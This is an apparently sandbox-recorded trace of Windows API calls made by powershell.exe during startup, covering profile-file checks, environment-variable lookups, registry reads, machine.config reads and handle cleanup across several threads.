	[0149.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d700 | out: lpFileInformation=0x14d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.124] SetErrorMode (uMode=0x1) returned 0x1
	[0149.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0149.124] SetErrorMode (uMode=0x1) returned 0x1
	[0149.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d700 | out: lpFileInformation=0x14d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0149.125] SetErrorMode (uMode=0x1) returned 0x1
	[0149.126] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.126] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.126] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.126] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.127] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.127] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.128] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.128] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.132] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.132] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.132] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a4
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b0
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x318
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x314
	[0149.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0149.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0149.135] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.135] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.136] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0149.231] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14d8e0 | out: lpMode=0x14d8e0) returned 1
	[0149.231] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.232] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.234] SetEvent (hEvent=0x3ac) returned 1
	[0149.234] SetEvent (hEvent=0x3c4) returned 1
	[0149.235] SetEvent (hEvent=0x3a4) returned 1
	[0149.235] SetEvent (hEvent=0x388) returned 1
	[0149.235] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0149.237] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.237] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.238] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d638 | out: phkResult=0x14d638*=0x350) returned 0x0
	[0149.238] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d5bc, lpData=0x0, lpcbData=0x14d5b8*=0x0 | out: lpType=0x14d5bc*=0x0, lpData=0x0, lpcbData=0x14d5b8*=0x0) returned 0x2

Thread:
	id = 149
	os_tid = 0xaf8


Thread:
	id = 152
	os_tid = 0x4e8


Thread:
	id = 154
	os_tid = 0xb18


Thread:
	id = 155
	os_tid = 0x4d0


Thread:
	id = 158
	os_tid = 0x690


Thread:
	id = 160
	os_tid = 0x738

	[0127.414] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0140.526] RegCloseKey (hKey=0x314) returned 0x0
	[0140.526] LocalFree (hMem=0x1a82e0) returned 0x0
	[0140.527] RegCloseKey (hKey=0x33c) returned 0x0
	[0140.527] LocalFree (hMem=0x1a8310) returned 0x0
	[0140.527] CloseHandle (hObject=0x334) returned 1
	[0140.527] CloseHandle (hObject=0x13) returned 1
	[0140.528] CloseHandle (hObject=0xf) returned 1
	[0140.528] RegCloseKey (hKey=0x31c) returned 0x0
	[0140.528] RegCloseKey (hKey=0x318) returned 0x0
	[0143.024] RegCloseKey (hKey=0x318) returned 0x0
	[0145.504] RegCloseKey (hKey=0x398) returned 0x0
	[0145.504] RegCloseKey (hKey=0x394) returned 0x0
	[0145.504] RegCloseKey (hKey=0x390) returned 0x0
	[0145.505] RegCloseKey (hKey=0x38c) returned 0x0
	[0145.505] RegCloseKey (hKey=0x364) returned 0x0
	[0145.505] RegCloseKey (hKey=0x3c0) returned 0x0
	[0145.505] RegCloseKey (hKey=0x3bc) returned 0x0
	[0145.506] RegCloseKey (hKey=0x384) returned 0x0
	[0145.506] RegCloseKey (hKey=0x380) returned 0x0
	[0145.506] RegCloseKey (hKey=0x37c) returned 0x0
	[0145.507] RegCloseKey (hKey=0x378) returned 0x0
	[0145.507] RegCloseKey (hKey=0x374) returned 0x0
	[0145.507] RegCloseKey (hKey=0x370) returned 0x0
	[0145.508] RegCloseKey (hKey=0x36c) returned 0x0
	[0145.508] RegCloseKey (hKey=0x368) returned 0x0
	[0145.508] RegCloseKey (hKey=0x3b8) returned 0x0
	[0145.508] RegCloseKey (hKey=0x358) returned 0x0
	[0145.509] RegCloseKey (hKey=0x354) returned 0x0
	[0145.509] RegCloseKey (hKey=0x350) returned 0x0
	[0145.509] RegCloseKey (hKey=0x34c) returned 0x0
	[0145.510] RegCloseKey (hKey=0x348) returned 0x0
	[0145.510] RegCloseKey (hKey=0x344) returned 0x0
	[0145.510] RegCloseKey (hKey=0x314) returned 0x0
	[0145.510] RegCloseKey (hKey=0x33c) returned 0x0
	[0145.511] RegCloseKey (hKey=0x3b4) returned 0x0
	[0145.511] RegCloseKey (hKey=0x31c) returned 0x0
	[0145.511] RegCloseKey (hKey=0x318) returned 0x0
	[0145.511] RegCloseKey (hKey=0x3b0) returned 0x0
	[0145.512] RegCloseKey (hKey=0x3ac) returned 0x0
	[0145.512] RegCloseKey (hKey=0x388) returned 0x0
	[0145.512] RegCloseKey (hKey=0x3c4) returned 0x0
	[0145.513] RegCloseKey (hKey=0x3a4) returned 0x0
	[0145.513] RegCloseKey (hKey=0x3a0) returned 0x0
	[0145.513] RegCloseKey (hKey=0x39c) returned 0x0
	[0153.108] RegCloseKey (hKey=0x350) returned 0x0
	[0155.604] CloseHandle (hObject=0x3cc) returned 1
	[0155.604] CloseHandle (hObject=0x3a8) returned 1
	[0155.605] CloseHandle (hObject=0x3bc) returned 1
	[0155.605] CloseHandle (hObject=0x384) returned 1
	[0155.606] CloseHandle (hObject=0x380) returned 1
	[0155.606] CloseHandle (hObject=0x37c) returned 1
	[0155.607] CloseHandle (hObject=0x374) returned 1
	[0155.607] CloseHandle (hObject=0x350) returned 1
	[0155.608] CloseHandle (hObject=0x378) returned 1
	[0155.728] CloseHandle (hObject=0x370) returned 1
	[0181.571] CoGetContextToken (in: pToken=0x2a8efb0 | out: pToken=0x2a8efb0) returned 0x0
	[0181.571] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0181.571] WbemLocator:IUnknown:Release (This=0x1c8316b0) returned 0x0
	[0181.571] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0181.571] IUnknown:Release (This=0x1c834830) returned 0x1
	[0181.572] CoGetContextToken (in: pToken=0x2a8ede0 | out: pToken=0x2a8ede0) returned 0x0
	[0181.572] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0181.572] IUnknown:Release (This=0x1c8345f8) returned 0x0
	[0181.633] CloseHandle (hObject=0x49c) returned 1
	[0181.633] CloseHandle (hObject=0x498) returned 1
	[0217.561] CoGetContextToken (in: pToken=0x2a8efb0 | out: pToken=0x2a8efb0) returned 0x0
	[0217.561] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.561] WbemLocator:IUnknown:Release (This=0x1c8318a0) returned 0x0
	[0217.561] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.561] IUnknown:Release (This=0x1c838410) returned 0x1
	[0217.561] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.561] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x0
	[0217.561] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.561] IUnknown:Release (This=0x1c83c960) returned 0x1
	[0217.561] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.561] WbemLocator:IUnknown:Release (This=0x1c831c00) returned 0x0
	[0217.562] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.562] IUnknown:Release (This=0x1c83de20) returned 0x1
	[0217.562] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.562] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x0
	[0217.562] CoGetContextToken (in: pToken=0x2a8eed0 | out: pToken=0x2a8eed0) returned 0x0
	[0217.562] IUnknown:Release (This=0x1c840950) returned 0x1
	[0217.562] CoGetContextToken (in: pToken=0x2a8ede0 | out: pToken=0x2a8ede0) returned 0x0
	[0217.562] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0217.563] IUnknown:Release (This=0x1c8381d8) returned 0x0
	[0218.090] CoGetContextToken (in: pToken=0x2a8ede0 | out: pToken=0x2a8ede0) returned 0x0
	[0218.090] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0218.090] IUnknown:Release (This=0x1c83c728) returned 0x0
	[0218.092] CoGetContextToken (in: pToken=0x2a8ede0 | out: pToken=0x2a8ede0) returned 0x0
	[0218.092] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x1
	[0218.092] IUnknown:Release (This=0x1c836188) returned 0x0
	[0218.093] CoGetContextToken (in: pToken=0x2a8ede0 | out: pToken=0x2a8ede0) returned 0x0
	[0218.093] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x1
	[0218.093] IUnknown:Release (This=0x1c840798) returned 0x0
	[0218.095] CloseHandle (hObject=0x4c8) returned 1
	[0218.095] CloseHandle (hObject=0x4cc) returned 1

Thread:
	id = 165
	os_tid = 0x334

	[0149.345] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.352] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0149.358] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.359] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.361] VirtualQuery (in: lpAddress=0x1c80dd60, lpBuffer=0x1c80ec20, dwLength=0x30 | out: lpBuffer=0x1c80ec20*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.426] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.426] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.430] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.430] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.434] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.434] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.551] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.551] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.555] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.555] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.557] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.557] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.563] VirtualQuery (in: lpAddress=0x1c80e010, lpBuffer=0x1c80eed0, dwLength=0x30 | out: lpBuffer=0x1c80eed0*(BaseAddress=0x1c80e000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.565] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.565] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.568] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.568] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.569] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.569] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.571] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.571] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.578] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.578] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.835] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.835] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.838] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.838] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.839] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.839] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.843] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.843] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.844] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.844] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.847] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.847] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.849] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.849] CoTaskMemFree (pv=0x1b7a4370) 
	[0149.966] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0149.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.966] CoTaskMemFree (pv=0x1b7a4370) 
	[0150.557] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0150.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.557] CoTaskMemFree (pv=0x1b7a4370) 
	[0150.560] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4370
	[0150.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0150.560] CoTaskMemFree (pv=0x1b7a4370) 
	[0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c80cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0152.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c80c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0152.234] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c8fa0
	[0152.234] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b7c8fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0152.234] CoTaskMemFree (pv=0x1b7c8fa0) 
	[0152.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0152.252] GetCurrentProcess () returned 0xffffffffffffffff
	[0152.252] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80caa8 | out: TokenHandle=0x1c80caa8*=0x370) returned 1
	[0152.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c80c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0152.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c80cb50 | out: lpFileInformation=0x1c80cb50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0152.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c80c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0152.405] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c80cb00 | out: lpFileInformation=0x1c80cb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0152.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c80c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0152.407] SetErrorMode (uMode=0x1) returned 0x1
	[0152.407] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x378
	[0152.407] GetFileType (hFile=0x378) returned 0x1
	[0152.407] SetErrorMode (uMode=0x1) returned 0x1
	[0152.407] GetFileType (hFile=0x378) returned 0x1
	[0152.410] GetFileSize (in: hFile=0x378, lpFileSizeHigh=0x1c80caf8 | out: lpFileSizeHigh=0x1c80caf8*=0x0) returned 0x622a
	[0152.410] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80ca18, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80ca18*=0x1000, lpOverlapped=0x0) returned 1
	[0152.420] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c548, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80c548*=0x1000, lpOverlapped=0x0) returned 1
	[0152.421] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c548, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80c548*=0x1000, lpOverlapped=0x0) returned 1
	[0152.421] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c548, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80c548*=0x1000, lpOverlapped=0x0) returned 1
	[0152.421] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c548, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80c548*=0x1000, lpOverlapped=0x0) returned 1
	[0152.431] ReadFile (in: hFile=0x378, lpBuffer=0x310f820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c688, lpOverlapped=0x0 | out: lpBuffer=0x310f820*, lpNumberOfBytesRead=0x1c80c688*=0x1000, lpOverlapped=0x0) returned 1
	[0153.108] ReadFile (in: hFile=0x378, lpBuffer=0x2faeb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c508, lpOverlapped=0x0 | out: lpBuffer=0x2faeb10*, lpNumberOfBytesRead=0x1c80c508*=0x22a, lpOverlapped=0x0) returned 1
	[0153.108] ReadFile (in: hFile=0x378, lpBuffer=0x2faeb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c80c5a8, lpOverlapped=0x0 | out: lpBuffer=0x2faeb10*, lpNumberOfBytesRead=0x1c80c5a8*=0x0, lpOverlapped=0x0) returned 1
	[0153.109] CloseHandle (hObject=0x378) returned 1
	[0153.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c80cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c80c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.111] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c8fa0
	[0153.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b7c8fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
